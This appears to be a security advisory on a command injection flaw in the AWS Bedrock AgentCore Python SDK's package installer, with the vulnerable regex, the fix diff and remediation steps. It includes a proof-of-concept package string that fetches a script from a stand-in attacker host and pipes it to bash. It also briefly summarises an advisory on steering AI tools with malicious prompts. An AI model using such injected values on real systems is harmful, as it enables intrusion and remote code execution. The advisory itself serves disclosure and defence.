Jul 25, 2026·5 min read·78 visits
A weakly validated package extras regex in bedrock-agentcore allows command execution inside the Code Interpreter sandbox via crafted package install requests.
An argument injection vulnerability in the AWS Bedrock AgentCore Python SDK allows authenticated users to execute arbitrary commands inside the Code Interpreter sandbox container via crafted Python package specifiers containing shell metacharacters.
The AWS Bedrock AgentCore Python SDK (bedrock-agentcore) exposes helper tools to manage the Bedrock Agent environment. Among these, the CodeInterpreter tool allows Python agents to run in a secure, isolated sandbox environment to execute dynamically generated code blocks. To facilitate third-party dependency installation inside this sandbox, the SDK provides an install_packages() interface that wraps the standard Python pip utility.
Because the sandbox must dynamically download packages on demand, it relies on system-level command execution to trigger the pip install binary. The vulnerability exists within this installation flow, specifically when processing PEP 508 "extras" specifiers inside the requested package strings. The library failed to restrict the input format adequately before executing the constructed command within the system shell.
An attacker who has access to supply package arguments to the CodeInterpreter workspace can inject shell metacharacters. These metacharacters execute arbitrary code under the authorization context of the sandbox container, compromising the integrity of the isolated session.
The core of the vulnerability lies in src/bedrock_agentcore/tools/code_interpreter_client.py within the install_packages() method. Prior to validation, the library attempted to match package names against an internal regular expression designed to enforce valid package naming conventions.
VALID_PACKAGE_NAME = re.compile(
r"^[a-zA-Z0-9]([a-zA-Z0-9._-]*[a-zA-Z0-9])?(\[.*\])?(==|>=|<=|!=|~=|>|<)?[a-zA-Z0-9.*]*$"
)The catastrophic structural flaw in this pattern resides in the capture group meant to identify package extras: (\[.*\])?. Because the regex engine utilizes the wildcard pattern .* greedily within the square brackets, it accepts any sequence of character inputs of arbitrary length. This greedy matching effectively invalidates the defensive properties of the regular expression.
Furthermore, the system executed the resulting command via a shell environment rather than spawning a direct subprocess with isolated arguments. This processing approach meant that any metacharacters containing shell instructions—such as $(), backticks, or semicolons—were evaluated directly by the underlying OS shell rather than being parsed as safe string arguments.
The security defect was resolved in commit 3c4b4ee6b8730e6313a82c743ac37dbcc1c21cdb by tightening the validation regular expression and implementing POSIX shell escaping.
@@ -6,6 +6,7 @@
import logging
import re
+import shlex
import uuid
from contextlib import contextmanager
from typing import Any, Dict, Generator, List, Optional, Union
@@ -20,8 +21,11 @@
DEFAULT_IDENTIFIER = "aws.codeinterpreter.v1"
+# Allowlist for pip package specifiers. The extras group is restricted to valid
+# extra names (comma-separated identifiers) rather than allowing arbitrary
+# characters, so only well-formed package specifiers are accepted.
VALID_PACKAGE_NAME = re.compile(
- r"^[a-zA-Z0-9]([a-zA-Z0-9._-]*[a-zA-Z0-9])?(\[.*\])?(==|>=|<=|!=|~=|>|<)?[a-zA-Z0-9.*]*$"
+ r"^[a-zA-Z0-9]([a-zA-Z0-9._-]*[a-zA-Z0-9])?(\[[a-zA-Z0-9._,\-]*\])?(==|>=|<=|!=|~=|>|<)?[a-zA-Z0-9.*]*$"
)
DEFAULT_TIMEOUT = 900
@@ -606,7 +610,8 @@ def install_packages(
if not VALID_PACKAGE_NAME.match(pkg):
raise ValueError(f"Invalid package name: {pkg}")
- packages_str = " ".join(packages)
+ # Quote each argument so it is passed to the command as a single literal token.
+ packages_str = " ".join(shlex.quote(pkg) for pkg in packages)
upgrade_flag = "--upgrade " if upgrade else ""
command = f"pip install {upgrade_flag}{packages_str}"The modified pattern restricts the character set permitted within the bracket block to [a-zA-Z0-9._,\-]. This prevents any injection of shell expansion tokens. Additionally, executing shlex.quote(pkg) before concatenation ensures that all characters are escaped according to shell-quoting rules.
An attacker with authorization to trigger package installation can supply a package name string structured to bypass the original validation regex while embedding a shell command execution payload.
To execute this exploit, the attacker crafts a payload utilizing the target dependency syntax:
numpy[$(curl -s http://attacker.com/payload.sh | bash)]
The validation mechanism processes this payload as follows:
numpy matches the starting identifier.[$(curl -s http://attacker.com/payload.sh | bash)] matches the greedy wildcard sequence \[.*\] because any characters within brackets are permitted.pip install numpy[$(curl -s http://attacker.com/payload.sh | bash)].$() prior to invoking the pip binary.The impact of this vulnerability is significant, carrying a CVSS v3.1 base score of 7.3. Because the execution takes place within the Code Interpreter container sandbox, the threat actor does not directly compromise the host hypervisor. However, the attacker gains full arbitrary code execution capabilities inside the container sandbox.
This execution capability allows attackers to exfiltrate session data, access temporary files, and read environmental tokens. In configurations where container network separation is weak, this execution point can be utilized to perform lateral port scans against internal AWS resources or adjacent microservices.
This flaw primarily risks data leakage and lateral movement. It can be chained with auxiliary sandbox escapes to threaten host operations.
The primary remediation for this vulnerability is upgrading the AWS Bedrock AgentCore Python SDK dependency to version 1.18.1 or higher. This upgrade implements both input validation hardening and structural shell argument quoting.
pip install --upgrade bedrock-agentcore>=1.18.1If upgrading is not immediately possible, organizations should implement the following compensating controls:
pip install command containing illegal syntax characters inside brackets, such as $, ;, or &.CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N| Product | Affected Versions | Fixed Version |
|---|---|---|
bedrock-agentcore AWS | >= 1.6.0, < 1.18.1 | 1.18.1 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-88 |
| Attack Vector | Network |
| CVSS v3.1 | 7.3 |
| EPSS Score | 0.00327 |
| Exploit Status | poc |
| KEV Status | Not Listed |
The product constructs an OS command using externally-influenced input, but it does not neutralize or incorrectly neutralizes argument delimiters, allowing an attacker to inject command-line arguments.
A critical remote, unauthenticated Denial of Service (DoS) vulnerability in @fastify/busboy (<= 3.2.0) allows attackers to crash the Node.js process. By submitting a crafted multipart/form-data request with a header key matching an inherited property of Object.prototype (like __proto__ or constructor), the internal HeaderParser triggers a synchronous TypeError.
SiYuan is an open-source personal knowledge management system. Its Model Context Protocol (MCP) implementation within the asset.upload tool contains a path-traversal and workspace boundary bypass flaw. This allows remote AI models—acting on behalf of attackers via malicious prompts or documents—to import and read sensitive host-system files, such as private keys and system configurations, through absolute path inputs.
An Server-Side Request Forgery (SSRF) vulnerability via DNS-Rebinding Time-of-Check to Time-of-Use (TOCTOU) has been discovered in SiYuan (思源笔记), an open-source personal knowledge management system. The flaw exists within the AI Agent tools http_request (util.HTTPRequest) and web_fetch (util.WebFetch) of the SiYuan Kernel, allowing unauthenticated remote attackers to bypass SSRF validation and access private internal services or cloud metadata endpoints.
An uncontrolled resource consumption vulnerability (CWE-1333 / CWE-400) exists in probe-image-size versions prior to 7.4.0. The SVG parser utilizes an unanchored, inefficient regular expression to find the SVG root tag, leading to catastrophic backtracking when handling malformed payloads. This blocks the single-threaded Node.js event loop, resulting in a complete denial of service.
CVE-2026-10032 is a DOM-based Cross-Site Scripting (XSS) vulnerability in Google's @a2ui/web_core Node.js library. The vulnerability is located within the openUrl utility function, which processes and opens dynamic URLs defined in layout configurations. Because the function fails to sanitize or validate the target URL scheme before passing it to the window.open browser sink, an attacker can specify a javascript: pseudo-protocol to execute arbitrary client-side script in the context of the host origin.
CVE-2026-59944 is a path traversal and link-following vulnerability in Composer, the PHP dependency manager. This flaw allows malicious or compromised packages to bypass previous path-hardening protections and perform arbitrary filesystem operations outside of their designated installation directory, leading to unauthorized permission modifications or execution proxy creations.